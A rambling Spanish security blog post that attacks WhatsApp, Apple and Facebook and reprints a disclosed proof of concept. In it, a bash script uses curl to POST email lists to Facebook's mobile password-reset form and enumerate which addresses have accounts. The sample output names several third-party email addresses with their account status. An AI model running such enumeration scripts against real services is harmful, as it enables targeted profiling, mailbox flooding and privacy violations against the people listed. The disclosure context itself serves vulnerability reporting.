FACEBOOK -RECORDANDO LO QUE PASÓ EL AÑO PASADO

Leyendo como cada día a mis fuentes ( es lo que tiene ser "Researcher" :p) y mientras conversaba con una
amiga en messenger, Gloria para más señas,  se me vino la idea de recordar lo que la gente de Security By Default ya demostró integramente es su PROOF OF CONCEPT ... pero yo quiero , porque esto Facebook se lo ha pasado por los webs !!!, recordar a la gente que me sigue , que todavía se puede hacer todo lo que vaís a leer a continuación ( y mucho más .. pero darnos tiempo que no damos a basto)  ... es más, no es que esto siga, es que NO nos hacen y perdón por la expersión NI PUTO CASO ...

(A Gloria la he prometido un artículo sobre el whats o esa "cosa raruna" como la llamo yo ... pero hoy toca esto "Glori" .....) 
Bueno, pues mi trabajo, o mejor dicho, nuestro trabajo, por lo menos en España es avisar y tener informados a "nuestra" gente, amigos y en mi caso a todos los que me siguen .. ( que me vaís a petar el "exchange Killer ... jajajaja) :p
.. Me apetecía hablar del what app como ya he comentado, pero no tengo la prueba de concepto (PoC) preparada y sabeís que sin demostrar, nada es válido en seguridad .. por lo tanto, "la extracción de datos mediante el SqlLiteManager" ya lo teneís en mis otros artículos, peeeeeeeeero es anterior a que la Apple Store retirara el Whats App por PELIGROSO !!! jajajaja :p:-)
...Y después de decir que "VAMOS TODOS CON EL WHATS APP de nuevo que ya está todo ok????" , valientes hijos de ....  vuestra madre claro, como no ... !!!! pero reviento el IOS si o si, y hago jeilbreaking si o si y me paso vuestra Apple Store POR ..., de hecho todos, nos reímos de la Apple Store, como no?..

Si estaís engañando a los usuarios .. por qué no les contaís que todos los mensajes se guardan en servidores en Apple en USA ? .. de eso no decimos nada no?? Pues ya lo haremos nosotros Y bien alto ...

El whats app hasta que no consigamos que sea de pago, no pararemos porque todo esto viene por no pagar un mísero euro .. pero no, como los USUARIOS son "lusers" .. nos aprovechamos no? ...

pues NI DE COÑA Dioses .. bueno Dioses, se os acabó con Windows 8 ... intentar mejorar el 8 Táctil con tablet ... en cliente... ahora os toca "shhhhhhhhhhhhh", Microsoft Win ... !!!

Apple ... not secure, no way  .. just live "MACWARE" Teneís, el MALWARE es para PC, PERO SI, CLARO QUE SI  SI PROGRAMAMOS "MACWARE" PARA MAC OS X Y TODAS LAS MANZANAS

 ... C L A R I N E T E  A MIS CURIOSOS NO HACKERS QUE ME SIGUEN NO???
 QUE PARA ESO OS DOY LA CONFIANZA, PARA QUE LEAÍS Y ESTÉIS AL LORO ... POR VUESTRA SEGURIDAD, NO POR LA MÍA ... !!!!

.. Bueno pues ya tenemos nosotros nuestros exploit preparado para "traernos" "todo" "lo que queramos" " de todos los numeros de telefono" y "a su vez" "de todos los contactos de los contactos del primer teélfono y así sucesivamente" ( ya ha salido en Tv CON la Actriz FAMOSA SCARLET JOHANSON .. no se como se escribe ni lo voy a mirar que voy contra -reloj .... no es nuevo, peeeeeeeeeeero yo tengo a mi gente y estas cosas salen en Antena3 ... Llaman a Chema, y mira que lo explica bien y "clarinete" ...
Si algo tiene Chema Alonso es que es más directo, claro y conciso que existe .. JODER, si en 2011 sale hablando que ningún móvil, ninguno realmente tiene una estructura de seguridad ..

Y  para mi, "APARTE DE COMPI DEL GREMIO " ES de lo mejor que existe en España, ya que a un hacker hay que calificarle en su TOTALIDAD , incluído como persona, no solo la técnica ... es como todos, experto en unas cosas .. y lo suyo son las web app y por eso hace el doctorado ... pero bueno, ya no te doy más coba tu tururú jajajajja !!! No time .... Teneís libros y de todo ... !!! No time .. jajajaja :p
PERO CUIDADO JUAN CARLOs GARCÍA, maquiavelo,  ESTABLECE ( ES DECIR YO "PISPO") QUE:
EXTRACCIÓN DE UNA ENTREVISTA EN MEXICO D.F ESTE VERANO:
**************************************************************
"NINGÚN TELEFONO ES SEGURO, SI BIEN ES CIERTO QUE BLACK-BERRY SI HA PASADO LOS COMMON CRITERIA DE SEGURIDAD .. NO UN EAL4 NI UN 7 QUE ES LO SUYO ..., PERO SE HA PRESENTADO Y LO HA SUPERADO ... DEJO ESE DATO CAER  A EMPRESAS Y A USUARIOS ... Y NOKIA SE LO TOMA EN SERIO ESTE TEMA .. OTRO DATO !!!..
ESTAMOS VIENDO QUE A LOS CEO EN ESPAÑA ( Y EN VUESTRO MÉXICO LINDO ...)  LES ENCANTA SOLTAR IPHONE Y TABLETS .. ES MÁS, ESTÁN UTILIZANDO EL WHATSS APP ENTRE LOS EMPLEADOS DE LAS EMPRESAS ENVIANDOSE MENSAJES DE CONTRASEÑAS Y USUARIOS POR PRISAS Y NO SABEMOS REALMENTE POR QUÉ ESTÁN OCURRIENDO ESTÁS COSAS ( Y MÁS HUGO Y MÁS ...) ...ESTAMOS EXTRAÑADOS CON EL MAL USO ...
 PERO "A MI ME ESTÁ REPORTANDO MUCHOS BENEFICIOS YA QUE LAS EMPRESAS ESTÁN TOMANDO UNA CONCIENCIA MUY SERIA DE LA SEGURIDAD INFORMÁTICA Y DE LA FUGA DE DATOS EN ESPAÑA
.. YA NO SOLO DE ATAQUES PROCEDENTES DEL EXTERIOR NO !!!,(BBVA Y BSCH FUERON CLARO EJEMPLO DE HACKING ÉPICO EN ESPAÑA)  ...
HABLAMOS DE FUGAS DE DATOS REALIZADAS POR LOS PROPIOS EMPLEADOS ( .. NO ES NUEVO CLARO ..), TRASNMISIÓN DE DATOS ENTRE EMPRESAS .. EN FIN "UNA MARAÑA" QUE NOS DA TRABAJO Y PROTEGEMOS A EMPRESAS Y USUARIOS ..
ESO ME GUSTA HUGO, ME ENCANTA :P .. PROTEGER LOS DATOS A SUS EMPLEADOS PARA CONECTARSE A SUS EMPRESAS, DAR PROTECCIÓN Y SEGURDAD A UNA EMPRESA ES DIFÍFIL, PERO SOMOS "CIRUJANOS" "DOCTORES" Y "ANALISTAS FORENSES" DE LA INFORMÁTICA ... SE NACE PARA ESTO, NO SE HACE ... Y SI "UN PACIENTE MÍO" TIENE "72 HORAS CRÍTICAS" , "ESTE CIRUJANO FORENSE" SE QUEDA CON SU "PACIENTE HASTA QUE SE LEVANTE", "S"I, O" SI" ...
"Y SI MI PACIENTE SE MUERE" HUGO, " TEN POR SEGURO QUE EL ANALISIS FORENSE QUE YO HAGA ME LLEVA HASTA EL CULPABLE DEL ATAKE , SI O SI ... Y SI NO SOY YO, SERÁ UN COLEGA DEL GREMIO , Y SI NO NOS PEDIMOS AYUDA, PERO "CAE" ... VAMOS SI CAE ... AUNQUE ME TENGA QUE TIRAR 60 HORAS DETRÁS SIN DORMIR .. EL FACTOR HUMANO FALLA, Y EN ESE MOMENTO, ESTAREMOS ESPERANDO ...
....Y NOS ESTÁN PIDIENDO QUE HAGAMOS ANALISIS DE SEGURIDAD Y QUE LES DIGAMOS QUE DEBEN UTILIZAR , COMO, CUANDO, POR QUÉ .. ES DECIR "NO CONSULTAN" jajajaja CUANDO ANTES LES DÁBAMOS MIEDO ... uhhhhhh :p ....
YO USO NOKIA POR EJEMPLO ... SISTEMA OPERATIVO... ANDROID EN LA VIDA CLARO ... SYMBIAN, ME QUEDO CON SYMBIAN .. Y YO SE POR QUÉ !!! :P,
No hace falta escribir una introducción de lo que es Facebook, creo que ya todos sabemos lo malo que es. El tema de la privacidad siempre ha sido un problema para Facebook, ya que si no existiera ese concepto su negocio sería más fácil.

Existen muchas formas de encontrar a personas que usen Facebook, como usar el propio buscador o simplemente consultando el nombre de una persona en Google. Sin ser usuario registrado, es posible conocer a todos los contactos de un usuario, acceder a la foto del perfil, conocer su nombre y si todo sale bien podemos encontrar detalles sobre su vida.

Lo que les comentaré ahora, corresponde a un fallo de seguridad encontrado en la versión móvil de Facebook, que obviamente, afecta a todos los usuarios. Este bug nos permite saber si existe una cuenta asociada a una dirección de correo o número telefónico.

 Si bien cualquier usuario podría "importar" una lista de correos y buscar coincidencias o simplemente usar el buscador de Facebook ingresando la dirección de un correo, el proceso también puede hacerse de forma automatizada, sin ningún tipo de filtros y pudiendo fastidiar a más de un usuario. Curiosamente, esto no se puede hacer en la versión principal de la red social, ya que tiene un CAPTCHA que no permite al bot realizar su trabajo.
El bug se encuentra en la opción "Recuperar contraseña" de la versión mobile (m.facebook.com), el formulario encargado del proceso de reinicio de contraseña no tiene ningún tipo de validación, carece de captchas y no tiene tokens de seguridad, por lo que es posible realizar peticiones POST desde sitios remotos o usando herramientas como curl o wget. Es posible aprovecharse de este bug y explotar la vulnerabilidad para enumerar usuarios según una lista de direcciones de correo o de números telefónicos. Para este ejemplo SE UTILIZANS  direcciones de correos tomadas desde distintas páginas de "contactos" al azar.

Prueba de Concepto   http://www.securitybydefault.com/ 
                              ( nos vemos en la Panda Security Blogger Submit 2012)

Al ingresar a la opción de Recuperar contraseña, nos aparece el siguiente formulario:


Hagamos la prueba de ingresar dos correos electrónicos, uno que sepamos que tiene cuenta en Facebook y otro inventado, que estemos seguros de que no tiene cuenta.
  • El correo de prueba verdadero es "pruebasfacebook@hushmail.com" (previamente creado y existente en Facebook)
  • La dirección de correo electrónica falsa será "asdfgasdfg@asdfg.ko".
El resultado es el siguiente, para ambos intentos:

Respuesta de la aplicación de Facebook cuando la dirección de correo electrónico tiene una cuenta asociada
Respuesta de la aplicación de Facebook cuando la dirección no tiene una cuenta asociada
Podemos repetir esta pregunta las veces que queramos, el sistema jamás nos pedirá que validemos que realmente seamos humanos, pudiendo crear un bot "ninja" que valide las cuentas que queramos.

El bot ninja

El script que usaremos de prueba es:
1
2
3
4
5
6
7
8
9
10
#/bin/bash
for mail in $(cat $1);
do
s=$(curl -s -d "ep=$mail" http://m.facebook.com/reset.php?refid=0|grep form>/dev/null);
if [ $? -eq 0 ]; then
echo "$mail No tiene cuenta.";
else
echo "$mail Si tiene cuenta.";
fi
done

Para ejecutarlo simplemente debemos pasarle un archivo con la lista de correos (correos_poc.txt como ejemplo) a validar:
$ sh poc.sh correos_poc.txt
mmercado@solteroingenieria.com Si tiene cuenta.
ileon@solteroingenieria.com Si tiene cuenta.
delapuente@solteroingenieria.com No tiene cuenta.
cvalenzuela@solteroingenieria.com Si tiene cuenta.
cloyola@solteroingenieria.com Si tiene cuenta.
fconte@capehornmarine.com No tiene cuenta.
diseno@capehornmarine.com Si tiene cuenta.
info@capehornmarine.com No tiene cuenta.
architect@capehornmarine.com Si tiene cuenta.
fconte@capehornmarine.com No tiene cuenta.
cc-ceics@msc.es No tiene cuenta.
clens@msc.es Si tiene cuenta.
ddocasar@msc.es Si tiene cuenta.
agomez@msc.es No tiene cuenta.
Esto mismo se puede hacer usando números telefónicos, para saber si existe alguna cuenta de Facebook asociada a un número.

Alcance de la vulnerabilidad

Sé que para muchos esto podría resultar trivial, pero pongámonos en el caso de un ataque dirigido a una empresa o a una persona, donde cada detalle y cada dato son valiosos. Si tuviésemos que validar una lista de miles de correos a mano, esto no sería factible.

También podría ser usado para fastidiar a personas o saturar casillas de correo, ya que al usuario al que pertenece el correo le llega un correo por cada petición realizada, como se aprecia en la siguiente captura:


Indiferente el alcance de esta vulnerabilidad, o si se tratase simplemente de un bug (porque sé que para muchos podría parecer inútil), Facebook no está validando peticiones desde sitios externos pudiendo generar peticiones GET/POST a formularios saltandose todo tipo de filtros.

Reporte y respuesta de Facebook

La vulnerabilidad fue reportada como CSRF en el Sitio Web Movil, usando el formulario "whitehat", con detalles e incluyendo una prueba de conceptos, la respuesta fue:
The ability to locate one of your friend's by their email address is core part of interacting with your friends on Facebook. When a user signs up to Facebook, there is an expectation that they may be located in this manner. An email --> user mapping is exposed in several parts of the site (predominantly, in search).
[...]
this style of information disclosure vulnerability may be applicable at a financial or banking website, it is a core part of the experience on social networks that are designed to connect email addresses to users. As another example, someone who desires to obtain this type of information could first load all of the email addresses into a throw-away email address book, and then utilize our contact importer tool. Requiring the registration of an account would not provide any significant additional friction.
While

Es decir, Facebook no asegura que la información de sus clientes usuarios no pueda ser recolectada de forma automática por un bot o por cualquier otro proceso, aún cuando existen los mecanismos de protección como los ya mencionados CAPTCHA o tokens.
Es decir, y más clarito " SE LA PELA QUE SE PUEDAN EJERCER TACTICAL FINFERPRINTING Y TACTICAL FOOTPRINTING A LOS USUARIOS VALIENDOSE, Y EN PALABRAS DE GOOGLE, DEL HECHO QUE: "
"...DESDE GOOGLE ASUMIMOS QUE EL 98% DE LOS USUARIOS NO SABEN LO QUE ES UN <IFRAME>"...
         ( EXTRAÍDO DE UN E MAIL DE UN ADVISORY DADO A FACEBOOK Y A GOOGLE ..) 
 MUY BIEN, VALE, YA NOS ENCARGAMOS NOSOTROS, DE ESTA MANERA, QUE LA GENTE SE VAYA ENTERANDO QUIEN ES FACEBOOK Y QUIEN ES MARCK ZUCKEEEERRRRRR QUE NO SE NI COMO SE ESCRIBE EL NOMBRE DEL TIPO ESTE ....
Y con esto y un bizcocho, hasta mañana a no se que hora porque nunca lo se ..
BlackHacking WRONG WAY ...!!!!
Saludo Hackers y curiosos
Maquiavelo ( el Juanki ..)

Entradas populares de este blog

SHELLCODES por un tubo ....

Proteger ASP.NET de inyecciones SQL How T0? BEST PRACTICES

CERTIFICACIONES DE SEGURIDAD